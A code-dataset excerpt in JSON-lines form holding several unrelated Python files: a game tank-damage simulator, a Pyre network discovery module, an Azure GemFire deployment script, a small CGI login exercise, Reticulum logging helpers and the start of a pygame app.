simulations):\n\t\ttdevs = copy.deepcopy(bossdamageevents)\n\t\ttpevs = copy.deepcopy(purifystaggerevents)\n\t\ttcsevs = copy.deepcopy(isbuseevents)\n\t\ttres = calcDamage(bossdamageevents=tdevs,\n\t\t\t\t\tpurifystaggerevents=tpevs,\n\t\t\t\t\tisbuseevents=tcsevs,\n\t\t\t\t\tbreaktime=breaktime, \n\t\t\t\t\tgotothreshold=gotothreshold,\n\t\t\t\t\tconfig=config)\n\t\tfor k, v in tres.items():\n\t\t\tif k in res.keys():\n\t\t\t\tif (type(v) == type(int()) or type(v) == type(float())):\n\t\t\t\t\tres[k] = res[k] + v\n\t\t\t\telif (k == \"playerclass\"):\n\t\t\t\t\tpass\n\t\t\t\telse:\n\t\t\t\t\tprint(\"non num value in res\")\n\t\t\telse:\n\t\t\t\tres[k] = v\n\t\n\tfor k, v in res.items():\n\t\tif (type(v) == type(int()) or type(v) == type(float())):\n\t\t\tres[k] = v / simulations\n\toutput.put(res)\n\t\ndef multithreadedsim(bossdamageevents=[],\n\t\t\t\tpurifystaggerevents=[],\n\t\t\t\tisbuseevents = [],\n\t\t\t\tbreaktime=100,\n\t\t\t\tconfig=configtemplate,\n\t\t\t\tgotothreshold=0.3,\n\t\t\t\tsimulations=100,\n\t\t\t\tthreadsnum=4):\n\t\t\t\t\n\tqueue = multiprocessing.Queue()\n\tthreads = []\n\t\n\tfor a in range(0, threadsnum):\n\t\ttdevs = copy.deepcopy(bossdamageevents)\n\t\ttpevs = copy.deepcopy(purifystaggerevents)\n\t\ttcsevs = copy.deepcopy(isbuseevents)\n\t\ttconf = copy.deepcopy(config)\n\t\tthreads.append(multiprocessing.Process(target=hiddenmultithreadedsim,\n\t\t\t\t\t\targs=(tdevs,\n\t\t\t\t\t\t\t\ttpevs,\n\t\t\t\t\t\t\t\ttcsevs,\n\t\t\t\t\t\t\t\tbreaktime,\n\t\t\t\t\t\t\t\ttconf,\n\t\t\t\t\t\t\t\tgotothreshold,\n\t\t\t\t\t\t\t\tint(simulations/threadsnum),\n\t\t\t\t\t\t\t\tqueue)))\n\t\t#print(str(threads[a]) + str(threads[a].is_alive()))\n\t\tthreads[a].start()\n\t\t\n\tfor p in threads:\n\t\tp.join()\n\tthreadres = [queue.get() for p in threads]\n\t\n\tres = {}\n\tfor tres in threadres:\n\t\t#print(str(tres))\n\t\tfor k, v in tres.items():\n\t\t\tif k in res.keys():\n\t\t\t\tif (type(v) == type(int()) or type(v) == type(float())):\n\t\t\t\t\tres[k] = res[k] + v\n\t\t\t\telif (k == \"playerclass\"):\n\t\t\t\t\tpass\n\t\t\t\telse:\n\t\t\t\t\tprint(\"non num value in res\")\n\t\t\telse:\n\t\t\t\tres[k] = v\n\t\t\n\tfor k, v in res.items():\n\t\tif (type(v) == type(int()) or type(v) == type(float())):\n\t\t\tres[k] = v / threadsnum\n\t#print(str(res))\n\treturn res\n\ndef statscaling(bossdamageevents=[],\n\t\t\t\tpurifystaggerevents=[],\n\t\t\t\tisbuseevents = [],\n\t\t\t\tbreaktime=100,\n\t\t\t\tconfig=configtemplate,\n\t\t\t\tgotothreshold=0.3,\n\t\t\t\tsimulations=100,\n\t\t\t\tscaling=20):\n\t\n\ttconf = copy.deepcopy(config)\n\ttdevs = copy.deepcopy(bossdamageevents)\n\ttpevs = copy.deepcopy(purifystaggerevents)\n\ttcsevs = copy.deepcopy(isbuseevents)\n\tbaseres = multithreadedsim(bossdamageevents=bossdamageevents,\n\t\t\t\t\tpurifystaggerevents=purifystaggerevents,\n\t\t\t\t\tisbuseevents=isbuseevents,\n\t\t\t\t\tbreaktime=breaktime, \n\t\t\t\t\tconfig=tconf,\n\t\t\t\t\tgotothreshold=gotothreshold,\n\t\t\t\t\tsimulations=simulations)\n\tprintresults(baseres)\n\tprint(\"scaling haste\")\n\ttconf = copy.deepcopy(config)\n\ttconf[\"haste\"] = tconf[\"haste\"] + scaling / 325\n\thasteres = multithreadedsim(bossdamageevents=bossdamageevents,\n\t\t\t\t\tpurifystaggerevents=purifystaggerevents,\n\t\t\t\t\tisbuseevents=isbuseevents,\n\t\t\t\t\tbreaktime=breaktime, \n\t\t\t\t\tconfig=tconf,\n\t\t\t\t\tgotothreshold=gotothreshold,\n\t\t\t\t\tsimulations=simulations)\n\tprintresults(hasteres)\n\t#print(\"TMI: \" + str(round(hasteres[\"tmi\"]/1000, 3)) + \"k ISB used:\" + str(hasteres[\"isb used\"]) + \" PB used:\" + str(hasteres[\"pb used\"]))\n\tprint(\"scaling mastery\")\n\ttconf = copy.deepcopy(config)\n\ttconf[\"mastery\"] = tconf[\"mastery\"] + scaling / 350\n\tmasteryres = multithreadedsim(bossdamageevents=bossdamageevents,\n\t\t\t\t\tpurifystaggerevents=purifystaggerevents,\n\t\t\t\t\tisbuseevents=isbuseevents,\n\t\t\t\t\tbreaktime=breaktime, \n\t\t\t\t\tconfig=tconf,\n\t\t\t\t\tgotothreshold=gotothreshold,\n\t\t\t\t\tsimulations=simulations)\n\t#print(\"TMI: \" + str(round(masteryres[\"tmi\"]/1000, 3)) + \"k ISB used:\" + str(masteryres[\"isb used\"]) + \" PB used:\" + str(masteryres[\"pb used\"]))\n\tprint(\"scaling crit\")\n\ttconf = copy.deepcopy(config)\n\ttconf[\"crit chance\"] = tconf[\"crit chance\"] + (scaling / 350) / 100\n\tcritres = multithreadedsim(bossdamageevents=bossdamageevents,\n\t\t\t\t\tpurifystaggerevents=purifystaggerevents,\n\t\t\t\t\tisbuseevents=isbuseevents,\n\t\t\t\t\tbreaktime=breaktime, \n\t\t\t\t\tconfig=tconf,\n\t\t\t\t\tgotothreshold=gotothreshold,\n\t\t\t\t\tsimulations=simulations)\n\t#print(\"TMI: \" + str(round(critres[\"tmi\"]/1000, 3)) + \"k ISB used:\" + str(critres[\"isb used\"]) + \" PB used:\" + str(critres[\"pb used\"]))\n\tprint(\"scaling versatility\")\n\ttconf = copy.deepcopy(config)\n\ttconf[\"versatility dr\"] = tconf[\"versatility dr\"] + scaling / 800\n\ttconf[\"versatility healing\"] = tconf[\"versatility healing\"] + scaling / 400\n\tversares = multithreadedsim(bossdamageevents=bossdamageevents,\n\t\t\t\t\tpurifystaggerevents=purifystaggerevents,\n\t\t\t\t\tisbuseevents=isbuseevents,\n\t\t\t\t\tbreaktime=breaktime, \n\t\t\t\t\tconfig=tconf,\n\t\t\t\t\tgotothreshold=gotothreshold,\n\t\t\t\t\tsimulations=simulations)\n\t#print(\"TMI: \" + str(round(versares[\"tmi\"]/1000, 3)) + \"k ISB used:\" + str(versares[\"isb used\"]) + \" PB used:\" + str(versares[\"pb used\"]))\n\t\n\tprint(\" STATS SCALING \")\n\tprint(\" | haste | mastery | crit | vers |\")\n\tprint(\" tmi: | %s | %s | %s | %s |\" % (\n\t\t(str(round((baseres[\"tmi\"] - hasteres[\"tmi\"]) / baseres[\"tmi\"] * 100, 2)) + \"%\").ljust(5, ' '),\n\t\t(str(round((baseres[\"tmi\"] - masteryres[\"tmi\"]) / baseres[\"tmi\"] * 100, 2)) + \"%\").ljust(5, ' '),\n\t\t(str(round((baseres[\"tmi\"] - critres[\"tmi\"]) / baseres[\"tmi\"] * 100, 2)) + \"%\").ljust(5, ' '),\n\t\t(str(round((baseres[\"tmi\"] - versares[\"tmi\"]) / baseres[\"tmi\"] * 100, 2)) + \"%\").ljust(5, ' ')))\n\tprint(\" dtps: | %s | %s | %s | %s |\" % (\n\t\t(str(round((baseres[\"damage taken\"] - hasteres[\"damage taken\"]) / baseres[\"damage taken\"] * 100, 2)) + \"%\").ljust(5, ' '),\n\t\t(str(round((baseres[\"damage taken\"] - masteryres[\"damage taken\"]) / baseres[\"damage taken\"] * 100, 2)) + \"%\").ljust(5, ' '),\n\t\t(str(round((baseres[\"damage taken\"] - critres[\"damage taken\"]) / baseres[\"damage taken\"] * 100, 2)) + \"%\").ljust(5, ' '),\n\t\t(str(round((baseres[\"damage taken\"] - versares[\"damage taken\"]) / baseres[\"damage taken\"] * 100, 2)) + \"%\").ljust(5, ' ')))\n\tprint(\" dps: | %s | %s | %s | %s |\" % (\n\t\t(str(round((hasteres[\"damage done\"] - baseres[\"damage done\"]) / baseres[\"damage done\"] * 100, 2)) + \"%\").ljust(5, ' '),\n\t\t(str(round((masteryres[\"damage done\"] - baseres[\"damage done\"]) / baseres[\"damage done\"] * 100, 2)) + \"%\").ljust(5, ' '),\n\t\t(str(round((critres[\"damage done\"] - baseres[\"damage done\"]) / baseres[\"damage done\"] * 100, 2)) + \"%\").ljust(5, ' '),\n\t\t(str(round((versares[\"damage done\"] - baseres[\"damage done\"]) / baseres[\"damage done\"] * 100, 2)) + \"%\").ljust(5, ' ')))\n\t\ndef printresults(res):\n\tif (res[\"playerclass\"] == \"monk\"):\n\t\tdamagetaken = res[\"damage taken\"]\n\t\taadamagetaken = res[\"autoattack damage taken\"]\n\t\tmagicdamagetaken = res[\"magic damage taken\"]\n\t\tdamagefromstagger = res[\"damage form stagger\"]\n\t\tdamagepurified = res[\"damage purified\"]\n\t\tisbused = res[\"isb used\"]\n\t\tpbused = res[\"pb used\"]\n\t\tdamagedone = res[\"damage done\"]\n\t\tsimduration = res[\"simulation duration\"]\n\t\ttmi = res[\"tmi\"]\n\t\tgotototalhealing = res[\"goto total healing\"]\n\t\tgotospawned = res[\"goto spawned\"]\n\t\texternalhealing = res[\"external healing\"]\n\t\temergencyhealing = res[\"emergency healing\"]\n\t\tcelestialfortunehealing = res[\"celestial fortune healing\"]\n\t\toverhealing = res[\"overhealing\"]\n\t\tprint(\"Total damage taken: \" + str(damagetaken))\n\t\tprint(\"Autoattack damage taken: \" + str(aadamagetaken))\n\t\tprint(\"Magic damage taken: \" + str(magicdamagetaken))\n\t\tprint(\"Damage from stagger: \" + str(damagefromstagger))\n\t\tprint(\"Damage purified: \" + str(damagepurified))\n\t\tprint(\"Percent damage purified: \" + str(damagepurified / (damagepurified + damagetaken)))\n\t\tprint(\"ISB used: \" + str(isbused))\n\t\tprint(\"PB used: \" + str(pbused))\n\t\tprint(\"Dps: \" + str(damagedone/simduration))\n\t\tprint(\"TMI: \" + str(round(tmi/1000, 3)) + \"k\")\n\t\tprint(\"external healing: \" + str(externalhealing))\n\t\tprint(\"celestial fortune healing: \" + str(celestialfortunehealing))\n\t\tprint(\"emergency healing: \" + str(emergencyhealing))\n\t\tprint(\"overhealing: \" + str(overhealing))\n\t\tprint(\"GotO total healing: \" + str(gotototalhealing) + \"\\n\")\n\t\ndef runSim():\n\t\n\tcurrentStagger = 0.8\n\tbaseavoidance = 10\n\tmastery = 0\n\tcurrentavoidance = 10\n\t\n\tbossdamageevents = []\n\tpurifystaggerevents = []\n\tisbuseevents = []\n\t\n\tfor a in range(0, 401):\n\t\tbossdamageevents.append(bossDamageEvent(time=1.5001 * a, damage=250, dodgeable=True))\n\tfor a in range(0, 31):\n\t\tbossdamageevents.append(bossDamageEvent(time=10.05 + 30 * a, damage=600, isPhisical=False, dodgeable=False, requireAM=True))\n\tfor a in range(0, 301):\n\t\tbossdamageevents.append(bossDamageEvent(time=10.05 + 2 * a, damage=65, isPhisical=False, dodgeable=False))\n\t# for a in range(0, 31):\n\t\t# purifystaggerevents.append(purifyStaggerEvent(time=10.1+30*a, purifymulti=0.5, forced=True))\n\t# for a in range(0, 31):\n\t\t# isbuseevents.append(isbUseEvent(time=7.9 + 30 * a, isbstagger=0.4, forced=True))\n\tbossdamageevents.sort(key=lambda e: e.time, reverse=True)\n\tpurifystaggerevents.sort(key=lambda e: e.time, reverse=True)\n\tisbuseevents.sort(key=lambda e: e.time, reverse=True)\n\t\n\tprint(\"scaling stats *10\")\n\tconf = copy.deepcopy(configtemplate)\n\tconf[\"talent 45\"] = \"gotm\"\n\tconf[\"brew recharge time\"] = 18\n\tconf[\"brew max charges\"] = 4\n\tconf[\"talent 100\"] = \"ed\"\n\tconf[\"haste\"] = 10\n\t#conf[\"mastery\"] = 25\n\ttdevs = copy.deepcopy(bossdamageevents)\n\ttpevs = copy.deepcopy(purifystaggerevents)\n\ttcsevs = copy.deepcopy(isbuseevents)\n\tstatscaling(bossdamageevents=tdevs,\n\t\t\t\tpurifystaggerevents=tpevs,\n\t\t\t\tisbuseevents=tcsevs,\n\t\t\t\tconfig=conf,\n\t\t\t\tgotothreshold=0.3,\n\t\t\t\tbreaktime=420,\n\t\t\t\tsimulations=1000,\n\t\t\t\tscaling=1000)\n\tprint(\"\\n\\n\")\n\t\nif __name__ == '__main__': \n\trunSim()\n\n\ta = input(\"ciao\")","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"544273262","text":"from pyre import Pyre\nfrom pyre import zhelper\nimport threading\nimport zmq\nimport logging\nimport json\nimport time\n\nfrom uniflex.core import modules\n\n__author__ = \"Piotr Gawlowicz\"\n__copyright__ = \"Copyright (c) 2015, Technische Universitat Berlin\"\n__version__ = \"0.1.0\"\n__email__ = \"{gawlowicz}@tkn.tu-berlin.de\"\n\n\nclass PyreDiscoveryMasterModule(modules.ControlApplication):\n def __init__(self, iface, groupName=\"uniflex\", downlink=None, sub=None,\n uplink=None, pub=None):\n super(PyreDiscoveryMasterModule, self).__init__()\n self.log = logging.getLogger('pyre_discovery_module.main')\n\n pyreLogger = logging.getLogger('pyre')\n pyreLogger.setLevel(logging.CRITICAL)\n\n self.running = False\n self.iface = iface\n self.sub = downlink\n if not self.sub:\n self.sub = sub\n self.pub = uplink\n if not self.pub:\n self.pub = pub\n self.groupName = groupName\n self.ctx = zmq.Context()\n\n def _sending_announcements(self):\n while self.running:\n self.log.debug(\"Discovery Announcements:\"\n \" SUB={}, PUB={}\"\n .format(self.sub, self.pub))\n\n msg = json.dumps({'downlink': self.sub,\n 'uplink': self.pub})\n self.discovery_pipe.send(msg.encode('utf_8'))\n time.sleep(2)\n\n @modules.on_start()\n def start_discovery_announcements(self):\n self.log.debug(\"Start discovery announcements\".format())\n self.running = True\n self.discovery_pipe = zhelper.zthread_fork(\n self.ctx, self.discovery_task)\n\n d = threading.Thread(target=self._sending_announcements)\n d.setDaemon(True)\n d.start()\n return True\n\n @modules.on_exit()\n def stop_discovery_announcements(self):\n self.log.debug(\"Stop discovery announcements\".format())\n if self.running:\n self.running = False\n self.discovery_pipe.send(\"$$STOP\".encode('utf_8'))\n\n def discovery_task(self, ctx, pipe):\n self.log.debug(\"Pyre on iface : {}\".format(self.iface))\n n = Pyre(self.groupName, sel_iface=self.iface)\n n.set_header(\"DISCOVERY_Header1\", \"DISCOVERY_HEADER\")\n n.join(self.groupName)\n n.start()\n\n poller = zmq.Poller()\n poller.register(pipe, zmq.POLLIN)\n\n while(True):\n items = dict(poller.poll())\n\n if pipe in items and items[pipe] == zmq.POLLIN:\n message = pipe.recv()\n # message to quit\n if message.decode('utf-8') == \"$$STOP\":\n break\n\n n.shout(self.groupName, message)\n\n n.stop()\n","sub_path":"apps/discovery_pyre/uniflex_app_discovery_pyre/pyre_discovery_master_module.py","file_name":"pyre_discovery_master_module.py","file_ext":"py","file_size_in_byte":2736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"617330903","text":"from __future__ import print_function\n\nimport argparse\nimport json\nimport os.path\nimport subprocess\nimport sys\n\n# global variables\nazureregions = [\n \"australiaeast\",\n \"australiasoutheast\",\n \"brazilsouth\",\n \"canadacentral\",\n \"canadaeast\",\n \"centralindia\",\n \"centralus\",\n \"eastasia\",\n \"eastus\",\n \"eastus2\",\n \"japaneast\",\n \"japanwest\",\n \"koreacentral\",\n \"koreasouth\",\n \"northcentralus\",\n \"northeurope\",\n \"southcentralus\",\n \"southeastasia\",\n \"southindia\",\n \"uksouth\",\n \"ukwest\",\n \"westcentralus\",\n \"westeurope\",\n \"westus\",\n \"westus2\"\n]\n\nvmtypes = [\n \"Standard_DS3_v2\",\n \"Standard_DS4_v2\",\n \"Standard_DS5_v2\"\n]\n\ndef detect_git_branch():\n \"\"\"\n returns 'master' in the event of any failure\n \"\"\"\n process = subprocess.Popen(['git','branch'], stdout=subprocess.PIPE, stderr = subprocess.STDOUT)\n out, err = process.communicate()\n if process.returncode != 0:\n return master\n\n for line in out.splitlines():\n if '*' in line:\n words = line.split()\n if len(words) == 2:\n return words[1]\n\n return 'master'\n\ndef parseArgs():\n parser = argparse.ArgumentParser(description = 'This script deploys a GemFire cluster on Azure')\n allgroup = parser.add_argument_group('arguments')\n allgroup.add_argument('--use-resource-group', help='The name of an existing resource group in which to deploy the GemFire cluster.')\n allgroup.add_argument('--admin-username', required=True, help='The username for SSH access to the deployed virtual machines')\n allgroup.add_argument('--admin-password', required=False, help='SSH password. If provided, password login for will be enabled on all machined. Cannot be combined with the --public-ssh-key-file argument.')\n allgroup.add_argument('--public-ssh-key-file',type=argparse.FileType('rb'), required = False, help='The path to a file containing the public half of the ssh key you will use to access the servers. May be .pub or .pem')\n allgroup.add_argument('--create-resource-group', help='The name of a new resource group. The GemFire cluster will be deployed in this group after it is created. This option is incompatible with --use-resource-group.')\n allgroup.add_argument('--resource-group-location', help='The Azure location where the new resource group will be created. This option must be supplied if --create-resource-group is supplied.This option is incompatible with --use-resource-group.', choices = azureregions)\n allgroup.add_argument('--resource-location', required=True, help='The Azure location where the new resources will be created. This is separate from the location of the resource group.', choices = azureregions)\n allgroup.add_argument('--datanode-count', type=int, required = True, choices=range(2,16), help='Number of data nodes that will be deployed.')\n allgroup.add_argument('--vmtype', required = False, default=\"Standard_DS3_v2\", choices=vmtypes, help='Azure VM Type')\n\n try:\n args = parser.parse_args()\n except IOError as ioe:\n if ioe.filename is not None:\n sys.exit('{0}: {1}'.format(ioe.strerror, ioe.filename))\n else:\n sys.exit(ioe.strerror)\n\n if args.use_resource_group is None and args.create_resource_group is None:\n sys.exit('one of --use-resource-group and --create_resource_group must be supplied')\n\n if args.use_resource_group is not None and args.create_resource_group is not None:\n sys.exit('only one of --use-resource-group and --create_resource_group can be supplied')\n\n if args.create_resource_group is not None and args.resource_group_location is None:\n sys.exit('--resource_group_location must be supplied whenever --create-resource-group is given')\n\n if args.admin_password is not None and args.public_ssh_key_file is not None:\n sys.exit('only one of --public-ssh-key-file and --admin-password can be supplied')\n\n\n return args\n\ndef azrun_list(cmds):\n \"\"\"\n runs an Azure cli command and parses the results as json\n this method calls sys.exit if the command is not successful\n \"\"\"\n print('running ' + ' '.join(cmds))\n proc = subprocess.Popen(['az'] + cmds, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin = subprocess.PIPE , cwd = here)\n out, err = proc.communicate()\n if proc.returncode != 0:\n sys.exit('An error occurred while executing ({0}): {1}'.format('az ' + ' '.join(cmds), err))\n\n return json.loads(out)\n\ndef azrun(cmds):\n \"\"\"\n runs an Azure cli command and parses the results as json\n this method calls sys.exit if the command is not successful\n \"\"\"\n return azrun_list(cmds.split())\n\ndef resource_group_exists(rgname):\n \"\"\"\n return True if the resource group exists or False if not\n \"\"\"\n listgroups = azrun('group list')\n for group in listgroups:\n if group['name'] == rgname:\n return True\n\n return False\n\ndef create_resource_group(name, location):\n azrun('group create --name {0} --location {1}'.format(name, location))\n\ndef read_key_file(filehandle):\n \"\"\"\n If the filehandle.name ends with .pub, ssh-keygen will be invoked to convert it\n to .pem format. filehandle will be closed.\n \"\"\"\n filename = filehandle.name\n if filename.endswith('.pub'):\n filehandle.close()\n sshkeygen = subprocess.Popen(['ssh-keygen','-f',filename, '-e','-m','pem'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE)\n out, err = sshkeygen.communicate()\n if sshkeygen.returncode != 0:\n sys.exit('An error occurred while reading the key file ({0}) : {1}'.format(sshkeygen.returncode, out))\n else:\n sshkey = out\n else:\n sshkey = filehandle.read(16384)\n filehandle.close\n\n return sshkey\n\n\nif __name__ == '__main__':\n here = os.path.dirname(os.path.abspath(sys.argv[0]))\n\n args = parseArgs()\n\n # create the resource group, or verify an existing one\n resourcegroup = None\n if args.use_resource_group is not None :\n if resource_group_exists(args.use_resource_group):\n resourcegroup= args.use_resource_group\n else:\n sys.exit('The specified resource group ({0}) does not exist.'.format(args.use_resource_group))\n else:\n if resource_group_exists(args.create_resource_group):\n sys.exit('Cannot create the resource group ({0}) because it already exists'.format(args.create_resource_group))\n\n create_resource_group(args.create_resource_group, args.resource_group_location)\n resourcegroup = args.create_resource_group\n\n # retrieve the ssh key material\n if args.public_ssh_key_file:\n sshkey = args.public_ssh_key_file.read(17384)\n args.public_ssh_key_file.close()\n authentication_type = 'sshPublicKey'\n else:\n authentication_type = 'password'\n sshkey = ''\n\n # generate artifactsBaseUrl and gemfireOnAzureProjectTag\n gitbranch = detect_git_branch()\n artifactsBaseUrl = 'https://raw.githubusercontent.com/Pivotal-Data-Engineering/gemfire-azure/' + gitbranch\n\n # compose the az command sshPublicKey\n\n overrides = ['--parameters', 'adminUserName={0}'.format(args.admin_username)]\n overrides.append('authenticationType={0}'.format(authentication_type))\n overrides.append('adminPassword={0}'.format(args.admin_password))\n overrides.append('sshPublicKey={0}'.format(sshkey))\n overrides.append('gemfireDatanodeCount={0}'.format(args.datanode_count))\n overrides.append('gemfireOnAzureProjectTag={0}'.format(gitbranch))\n overrides.append('artifactsBaseUrl={0}'.format(artifactsBaseUrl))\n overrides.append('location={0}'.format(args.resource_location))\n overrides.append('datanodeVmType={0}'.format(args.vmtype))\n\n print('Deployment has begun. This may take a while. Use the Azure portal to view progress...')\n\n #debug azrun_list(['group', 'deployment', 'create','--debug', '--resource-group', resourcegroup, '--template-file', os.path.join(here, 'mainTemplate.json')] + overrides)\n azrun_list(['group', 'deployment', 'create', '--resource-group', resourcegroup, '--template-file', os.path.join(here, 'mainTemplate.json')] + overrides)\n print('GemFire cluster deployed.')\n","sub_path":"deploy.py","file_name":"deploy.py","file_ext":"py","file_size_in_byte":8239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"319465457","text":"s_header = '''\n\n\n中转页面\n\n\n'''\ns_footer = '''\n\n\n'''\nadmin = '''\n\n

    登陆成功

    \n

    单击下方链接,进入书籍修改界面

    \n

    开始修改

    \n'''\nunadmin = '''\n\n

    登陆失败

    \n

    单击下方链接,进入返回游客界面

    \n

    返回

    \n'''\nimport libs\nimport cgi\n\nform = cgi.FieldStorage()\nuser_name = form['u_name'].value\nuser_psw = form['u_psw'].value\n\nif user_name=='admin' and user_psw == '123456':\n s_body = admin\nelse:\n s_body = unadmin\n\ns_page = s_header + s_body + s_footer\nprint(s_page)\n","sub_path":"第9章-习题-wwwroot/cgi-bin/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"152857589","text":"import os\nimport sys\nimport glob\nimport time\nimport random\nimport threading\n\nfrom .Reticulum import Reticulum\nfrom .Identity import Identity\nfrom .Link import Link\nfrom .Transport import Transport\nfrom .Destination import Destination\nfrom .Packet import Packet\nfrom .Packet import PacketReceipt\nfrom .Resource import Resource\n\nmodules = glob.glob(os.path.dirname(__file__)+\"/*.py\")\n__all__ = [ os.path.basename(f)[:-3] for f in modules if not f.endswith('__init__.py')]\n\nLOG_CRITICAL = 0\nLOG_ERROR = 1\nLOG_WARNING = 2\nLOG_NOTICE = 3\nLOG_INFO = 4\nLOG_VERBOSE = 5\nLOG_DEBUG = 6\nLOG_EXTREME = 7\n\nLOG_STDOUT = 0x91\nLOG_FILE = 0x92\n\nloglevel = LOG_NOTICE\nlogfile = None\nlogdest = LOG_STDOUT\nlogtimefmt = \"%Y-%m-%d %H:%M:%S\"\n\nrandom.seed(os.urandom(10))\n\n_always_override_destination = False\n\nlogging_lock = threading.Lock()\n\ndef loglevelname(level):\n if (level == LOG_CRITICAL):\n return \"Critical\"\n if (level == LOG_ERROR):\n return \"Error\"\n if (level == LOG_WARNING):\n return \"Warning\"\n if (level == LOG_NOTICE):\n return \"Notice\"\n if (level == LOG_INFO):\n return \"Info\"\n if (level == LOG_VERBOSE):\n return \"Verbose\"\n if (level == LOG_DEBUG):\n return \"Debug\"\n if (level == LOG_EXTREME):\n return \"Extra\"\n \n return \"Unknown\"\n\ndef log(msg, level=3, _override_destination = False):\n global _always_override_destination\n \n if loglevel >= level:\n timestamp = time.time()\n logstring = \"[\"+time.strftime(logtimefmt)+\"] [\"+loglevelname(level)+\"] \"+msg\n logging_lock.acquire()\n\n if (logdest == LOG_STDOUT or _always_override_destination):\n print(logstring)\n logging_lock.release()\n\n elif (logdest == LOG_FILE and logfile != None):\n try:\n file = open(logfile, \"a\")\n file.write(logstring+\"\\n\")\n file.close()\n logging_lock.release()\n except Exception as e:\n logging_lock.release()\n _always_override_destination = True\n log(\"Exception occurred while writing log message to log file: \"+str(e), LOG_CRITICAL)\n log(\"Dumping future log events to console!\", LOG_CRITICAL)\n log(msg, level)\n \n\ndef rand():\n result = random.random()\n return result\n\ndef hexrep(data, delimit=True):\n delimiter = \":\"\n if not delimit:\n delimiter = \"\"\n hexrep = delimiter.join(\"{:02x}\".format(c) for c in data)\n return hexrep\n\ndef prettyhexrep(data):\n delimiter = \"\"\n hexrep = \"<\"+delimiter.join(\"{:02x}\".format(c) for c in data)+\">\"\n return hexrep\n\ndef panic():\n os._exit(255)","sub_path":"RNS/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"289912378","text":"\nfrom InfoSeparatorOne import*\nfrom InfoSeparatorTwo import*\nfrom InfoSeparatorThree import*\nfrom InfoSeparatorFive import*\nfrom InfoSeparatorFour import*\n\nimport os\nimport pygame\n\nos.environ['GOOGLE_APPLICATION_CREDENTIALS'] = 'C:\\\\Users\\\\Diane_HU\\\\Desktop\\\\API_Credential.json'\n\n\n \n\nclass PygameGame(object):\n \n # Helpers\n # Init functions\n def initColor(self):\n self.white = (255,255,255)\n self.black= (0,0,0)\n\n #self.deepBlue= (68,118,192)\n #self.darkBlue = (51,87,117)\n self.grey=(99,99,112)\n self.orange=(222,141,71)\n \n self.blueGray = self.hex_to_rgb(\"#343f51\")\n self.deepBlueGray = self.hex_to_rgb(\"#2e3242\")\n self.darkBlueGray = self.hex_to_rgb(\"#1b2331\")\n \n self.lightOrange=(240,190,98)\n self.orange = (255,135,0) #normal\n self.darkOrange = (221,111,15) #motion\n self.deepOrange = self.hex_to_rgb(\"#c16112\") #pressed\n \n def within(self,left,down,width,height,x,y):\n return left < x < left+width and down < y < down +height\n\n def hex_to_rgb(self,value):\n \"\"\"Return (red, green, blue) for the color given as #rrggbb.\"\"\"\n value = value.lstrip('#')\n lv = len(value)\n return tuple(int(value[i:i + lv // 3], 16) for i in range(0, lv, lv // 3))\n \n def loadFont(self):\n self.regularFont = pygame.font.SysFont(\"Arvo-Bold.ttf\",35)\n self.topicFont=pygame.font.SysFont(\"Arvo-Bold.ttf\",60)\n self.buttonFont = pygame.font.SysFont(\"Arvo-Bold.ttf\",30)\n self.calendarFont=pygame.font.SysFont(\"Arvo-Bold.ttf\",25)\n self.weekFont=pygame.font.SysFont(\"Arvo-Bold.ttf\",20)\n self.cuteFont = pygame.font.SysFont(\"EastSeaDokdo-Regular.ttf\",30)\n\n#############################\n#all button\n#############################\n\n def signButtons(self):\n width= 300\n height = 40\n gap = 20\n self.signInBtn = [118,475,width,height, self.orange] \n self.signUpBtn = [118,475+gap+height,width,height,self.orange] \n\n def interestButtons(self):\n gap=10\n btnHeight=35\n self.interestButtonList=[]\n for i in range(0,len(self.interestList)):\n lenText=len(self.interestList[i])\n self.interestButtonList+=InterestBox(43,30+btnHeight*i+gap*i,\\\n lenText*10+20,btnHeight,\\\n self.interestList[i])\n \n def mainButtons(self):\n width=150\n gap=20\n self.mainEvent1=[43,140,450,width,self.white]\n self.mainEvent2=[43,140+width+gap,450,width,self.white]\n self.mainEvent3=[43,140+width*2+gap*2,450,width,self.white]\n self.mainCircle=[self.orange,218,779,70]\n self.mainCommunityBtn=[0,739,188,80,self.orange]\n self.mainCalendarBtn=[348,739,241,80,self.orange]\n \n \n def handButtons(self):\n self.titleInput()\n self.dateInput()\n self.beginTimeInput()\n self.endTimeInput()\n self.locationInput()\n \n \n \n def buttons(self):\n self.interestInput()\n self.signButtons()\n self.interestButtons()\n self.mainButtons()\n self.handButtons()\n self.importButtons=[self.orange,(268,500),200]\n self.friendEventBtn=[118,100,300,200,self.orange]\n self.localEventBtn=[118,350,300,200,self.orange]\n self.preferenceBtn=[118,475,300,40,self.orange]\n self.handCircle=[self.orange,(160,679),40]\n self.libraryInputCircle=[self.orange,(268,639),40]\n self.cameraCircle=[self.orange,(376,679),40]\n \n \n##############################\n#text input boxes\n##############################\n def interestInput(self):\n #text input box at interest input page\n self.interestList=[]\n self.interestInput=\"\"\n boxWidth=450\n boxHeight=35\n self.interestInputBox=[43,150,boxWidth,boxHeight,self.orange]\n \n def titleInput(self):\n self.titleText=\"\"\n boxWidth=450\n boxHeight=35\n self.titleInputBox=[43,150,boxWidth,boxHeight,self.orange]\n \n def dateInput(self):\n self.dateText=\"\"\n boxWidth=200\n boxHeight=35\n self.dateInputBox=[43,245,boxWidth,boxHeight,self.orange]\n \n def beginTimeInput(self):\n self.beginTimeText=\"\"\n boxWidth=100\n boxHeight=35\n self.beginTimeInputBox=[43,340,boxWidth,boxHeight,self.orange]\n \n def endTimeInput(self):\n self.endTimeText=\"\"\n boxWidth=100\n boxHeight=35\n self.endTimeInputBox=[158,340,boxWidth,boxHeight,self.orange]\n \n def locationInput(self):\n 